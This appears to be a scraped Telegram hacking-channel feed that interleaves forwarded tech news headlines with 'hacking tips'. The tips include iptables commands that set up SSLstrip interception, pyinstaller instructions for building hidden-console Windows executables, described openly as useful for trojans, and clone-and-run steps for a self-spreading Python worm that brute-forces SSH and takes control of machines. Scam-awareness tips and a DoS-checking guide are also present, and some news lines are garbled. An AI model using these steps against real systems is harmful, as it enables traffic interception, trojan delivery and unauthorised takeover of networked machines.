UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
Forwarded from UNDERCODE NEWS
"Focus on Japanese market" and CEO DX of the US Box and tailwind "de-PPAP"
#International
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑random hacking tips

SSLstrip
To use SSLstrip, use the following command to enable it in iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

This ensures that all traffic arriving on port 80, the default port for HTTP websites, is redirected to port 10000, the port the SSLstrip tool uses.

To use packet-modifying tools together with SSLstrip, configure them to watch port 10000 instead of 80 and enter the commands below in a Linux shell:

iptables -I INPUT -j NFQUEUE --queue-num <number>
iptables -I OUTPUT -j NFQUEUE --queue-num <number>

🦑Executable files
Converting scripts into executables:
Note that we focus on creating Windows executables: on Linux and macOS the problem is trivial, because both operating systems have Python installed by default and can run Python scripts directly. Another problem is that on Linux, obfuscating such an executable file is almost impossible -

Despite all those differences between systems, pyinstaller should work on each one of them anyway.

🦑On Windows
In order to package Python scripts into executable files, you need to have "pyinstaller" installed and you have to run the following command:
pyinstaller <script_name.py> --onefile --noconsole

You might need to use a path to pyinstaller instead, if it's not added to PATH.

--onefile argument ensures all the required libraries and files are put into single executable.

--noconsole argument disables console, so when we run the program, no terminal shows up. Please note that some Python scripts may require "stdin", "stdout" and "stderr" to be handled properly (it is handled in our program).
The created executable can be found in the "dist" folder.

To package multiple files together with the Python script (used for creating trojans), use:
--add-data "abs/path/to/file;."

This is especially useful when creating trojans. The dot means the file will be stored (after running) in a default temp directory. Can be changed to directory of preference.

🦑On Linux

If you need to create an .exe file from a Linux machine (not recommended - it's better to do it natively), you need a Python interpreter in its Windows version. In order to do that, Wine is required (should be installed by default on Kali Linux).

After you've got both Python downloaded and Wine installed, type in the following command:
wine msiexec /i <python_installer_file>

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Elbrusov will be generated 20 times less than Baikal in 2021, but the developers do not consider this a loss.
#Technologies
Forwarded from UNDERCODE NEWS
Amazon begs the court not to order the resumption of social network web hosting facilities by Parler.
#International
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top scams:

1) Text messaging scam
Be careful with phone messages.

SMS Text Messages From Microsoft - Genuine or Phishing?

Some messages, claiming that you have won a huge amount of money, etc., are attempts to cheat you.

You may also receive such messages appearing to come from a bank, PayPal, Apple or any other well-known brand.

This could be a different type of phishing.

Tips: Don't click on the link, even if it looks like a link from a bank or PayPal, etc.

Do not call the numbers listed. Contact your bank and let them know about the incident.

2) Technical support scammers
These are the biggest consumer scams at the moment.

This mainly applies to the elderly.

You may receive an unsolicited call from a person who claims to be from Microsoft technical support or any other technical support provider, asking for permission to access your computer and saying that your computer may be infected with viruses or other malware.

Tips: just hang up and don't trust them.

Neither Microsoft nor any technical support team will call you that way.

3) Income tax fraud
You may receive a call / email from a person allegedly from the tax authority, stating that you have some unpaid taxes and threatening that if you do not pay the full amount due immediately by bank transfer, they will file a lawsuit, etc.

Tips: Don't call that person. Do not transfer money or make payments in a panic.

Call the tax hotline and tell them about the problem.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
AMD CEO: Apple's M1 chip leads creativity, GPU collaboration between the two sides will continue.
#International #Technologies
Forwarded from UNDERCODE NEWS
A T-shirt sold on Amazon was titled "Trump was titled"
#International
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to quickly check if your Linux server is under DoS attack from a single IP address?

A) What do you need
The only thing you need to do this is a Linux server and a user with sudo privileges.

I will be demonstrating on Ubuntu Server 20.04.

We are going to use the netstat tool to find out what IPs are currently connected to your server.

To install netstat on Ubuntu, you actually install net-tools, for example:

> sudo apt-get install net-tools -y
If you are using CentOS or a Red Hat based installation, netstat should already be installed.

B) How to check your server load
The first thing we're going to do is check the load on our server.

The command we will use for this will return the number of logical processors (threads).

On the server, this number should be pretty low, but it depends on what you are running.

While you know everything is in order, run the command and record the number as your baseline.

If you suspect something is happening, run the check again and compare the results.

To check the number of logical processors, enter the command:

grep processor /proc/cpuinfo | wc -l

> If this number is significantly higher than your baseline, you may be in trouble.

For example, on my Pop!_OS I have 16 threads, but on a Nextcloud hosted Ubuntu server I only have two.

If any of these numbers doubled, I could be exposed to a DDoS attack.

C) How to check the load on your network
Next, we will check the load on our network.

It can be done with a number of tools, but I choose nload.

To install nload, enter the command:

sudo apt-get install nload -y
On CentOS, this command would be:
sudo dnf install nload -y
To run the tool, just enter the command:
nload


If this load is significantly higher than you expect, you may be under attack.

D) How to find out which IP addresses are connected to your server
The next thing you need to do is find out which IPs are connected to your server.

For this we will use netstat like this:

netstat -ntu | awk '{print $5}' | cut -d: -f1 -s | sort | uniq -c | sort -nk1 -r
The output from the above command will list each IP address connected to the server and the number of instances of each.
Be sure to review this list carefully. If you see an IP address with a large number of instances (over 100), the chances of the address being the culprit for the load are pretty high.
Once you are sure of culpability, you can block the IP address with the command:

> sudo route add ADDRESS reject

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Zoom plans to collect US$ 1.5 billion through a second equity sale.
#International
Forwarded from UNDERCODE NEWS
Apple CEO Cook: Big news, but not new items, will be revealed tomorrow.
#International
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Python network worm that spreads on the local network and gives the attacker control of these machines:
You can bruteforce ssh servers, spread with USBs, etc..

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/pylyf/NetWorm.git

2) cd NetWorm

3) python worm.py


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁